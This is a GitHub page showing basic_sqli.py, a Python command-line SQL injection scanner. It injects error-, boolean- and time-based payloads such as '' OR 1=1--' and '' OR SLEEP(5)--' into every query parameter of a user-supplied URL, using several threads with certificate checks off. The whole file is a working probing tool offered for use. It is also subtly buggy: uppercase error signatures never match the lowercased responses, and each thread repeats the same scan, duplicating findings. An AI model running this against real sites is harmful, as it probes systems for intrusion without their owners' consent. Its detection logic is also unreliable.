-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathbasic_sqli.py
More file actions
193 lines (164 loc) · 7.05 KB
/
basic_sqli.py
File metadata and controls
193 lines (164 loc) · 7.05 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
import requests
import re
import threading
import time
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
from colorama import Fore, init
from optparse import OptionParser
# Initialize colorama for colored output
init(autoreset=True)
# SQL Injection payloads: error-based, boolean-based, time-based, etc.
SQLI_PAYLOADS = {
"error_based": ["' OR 1=1--", "' AND 1=2--", "' UNION SELECT 1,2,3--"],
"boolean_based": ["' OR '1'='1", "' AND '1'='2", "' OR 'a'='a"],
"time_based": ["' OR SLEEP(5)--", "'; WAITFOR DELAY '0:0:5'--"]
}
# Known SQL error messages (from various databases)
SQL_ERRORS = [
"you have an error in your sql syntax", "warning: mysql", "unclosed quotation mark",
"quoted string not properly terminated", "sql syntax", "syntax error",
"ORA-01756", "UNION SELECT", "pg_query", "SQLite"
]
# Function to print a banner
def print_banner():
print(Fore.GREEN + '''
██████ █████ ██▓ ██▓
▒██ ▒ ▒██▓ ██▒▓██▒ ▓██▒
░ ▓██▄ ▒██▒ ██░▒██░ ▒██▒
▒ ██▒░██ █▀ ░▒██░ ░██░
▒██████▒▒░▒███▒█▄ ░██████▒░██░
▒ ▒▓▒ ▒ ░░░ ▒▒░ ▒ ░ ▒░▓ ░░▓
░ ░▒ ░ ░ ░ ▒░ ░ ░ ░ ▒ ░ ▒ ░
░ ░ ░ ░ ░ ░ ░ ▒ ░
░ ░ ░ ░ ░
Basic SQL Injection Scanner - Python tool
''')
# Function to send a GET request
def send_request(url, headers=None):
try:
response = requests.get(url, headers=headers, timeout=10, verify=False)
return response
except requests.RequestException as e:
print(Fore.RED + f"Error with request: {e}")
return None
# Function to check if a response indicates a SQL error
def check_for_sqli(response):
if response:
for error in SQL_ERRORS:
if error in response.text.lower():
return True
return False
# Function to inject payload into a specific parameter
def replace_param(url, param, payload):
parsed_url = urlparse(url)
query = parse_qs(parsed_url.query)
query[param] = payload
new_query = urlencode(query, doseq=True)
new_url = parsed_url._replace(query=new_query)
return urlunparse(new_url)
# Function to test each payload
def test_payload(url, param, payload, headers=None):
modified_url = replace_param(url, param, payload)
response = send_request(modified_url, headers)
if response and check_for_sqli(response):
print(Fore.RED + f"[+] SQL Injection found on parameter '{param}' with payload '{payload}'")
print(Fore.RED + f"URL: {modified_url}")
return modified_url
return None
# Function to test for time-based blind SQL injection
def test_time_based_payload(url, param, payload, delay, headers=None):
modified_url = replace_param(url, param, payload)
start_time = time.time()
response = send_request(modified_url, headers)
end_time = time.time()
if response and (end_time - start_time) >= delay:
print(Fore.RED + f"[+] Time-based Blind SQL Injection found on parameter '{param}' with payload '{payload}'")
print(Fore.RED + f"URL: {modified_url}")
return modified_url
return None
# Function to get parameters from a URL
def get_parameters(url):
parsed_url = urlparse(url)
query = parsed_url.query
params = re.findall(r"([^&=?]+)=([^&=?]+)", query)
return [param[0] for param in params]
# Function to scan URL for SQL Injection vulnerabilities
def scan_url(url, headers=None, delay=5, verbose=False):
params = get_parameters(url)
results = []
for param in params:
# Error-based and Boolean-based Payload Testing
for category, payloads in SQLI_PAYLOADS.items():
for payload in payloads:
if verbose:
print(Fore.GREEN + f"Testing parameter '{param}' with {category} payload '{payload}'")
result = test_payload(url, param, payload, headers)
if result:
results.append(result)
# Time-based Blind Payload Testing
for payload in SQLI_PAYLOADS["time_based"]:
if verbose:
print(Fore.GREEN + f"Testing parameter '{param}' with time-based payload '{payload}'")
result = test_time_based_payload(url, param, payload, delay, headers)
if result:
results.append(result)
return results
# Multithreading to scan with multiple threads
def scan_url_multithreaded(url, headers=None, delay=5, threads=5, verbose=False):
print(Fore.GREEN + f"[+] Starting scan with {threads} threads")
results = []
# Thread worker function
def worker():
nonlocal results
result = scan_url(url, headers, delay, verbose)
if result:
results.extend(result)
# Start threads
threads_list = []
for _ in range(threads):
thread = threading.Thread(target=worker)
thread.start()
threads_list.append(thread)
# Wait for all threads to complete
for thread in threads_list:
thread.join()
return results
# Save results to file
def save_results(results, filename):
if results:
with open(filename, 'w') as f:
for result in results:
f.write(result + '\n')
print(Fore.GREEN + f"[+] Results saved to {filename}")
else:
print(Fore.RED + "[-] No vulnerabilities found to save.")
# Main function to parse command-line arguments and execute the scanner
def main():
print_banner()
# Parse command line options
parser = OptionParser()
parser.add_option('--url', dest="url", help="Target URL", metavar="URL")
parser.add_option('--headers', dest="headers", help="Custom headers for requests")
parser.add_option('--verbose', dest="verbose", action="store_true", help="Enable verbose output")
parser.add_option('--threads', dest="threads", default=5, type="int", help="Number of concurrent threads")
parser.add_option('--delay', dest="delay", default=5, type="int", help="Delay in seconds for time-based SQLi")
parser.add_option('--output', dest="output", help="File to save the results")
options, args = parser.parse_args()
if not options.url:
print(Fore.RED + "[-] Please provide a URL with --url.")
return
# Prepare headers (if provided)
headers = None
if options.headers:
headers = {h.split(":")[0].strip(): h.split(":")[1].strip() for h in options.headers.split(",")}
# Start the scan
results = scan_url_multithreaded(options.url, headers=headers, delay=options.delay, threads=options.threads, verbose=options.verbose)
if results:
print(Fore.RED + f"[+] Found {len(results)} potential vulnerabilities!")
else:
print(Fore.GREEN + "[-] No vulnerabilities found.")
# Save results if an output file is specified
if options.output:
save_results(results, options.output)
if __name__ == "__main__":
main()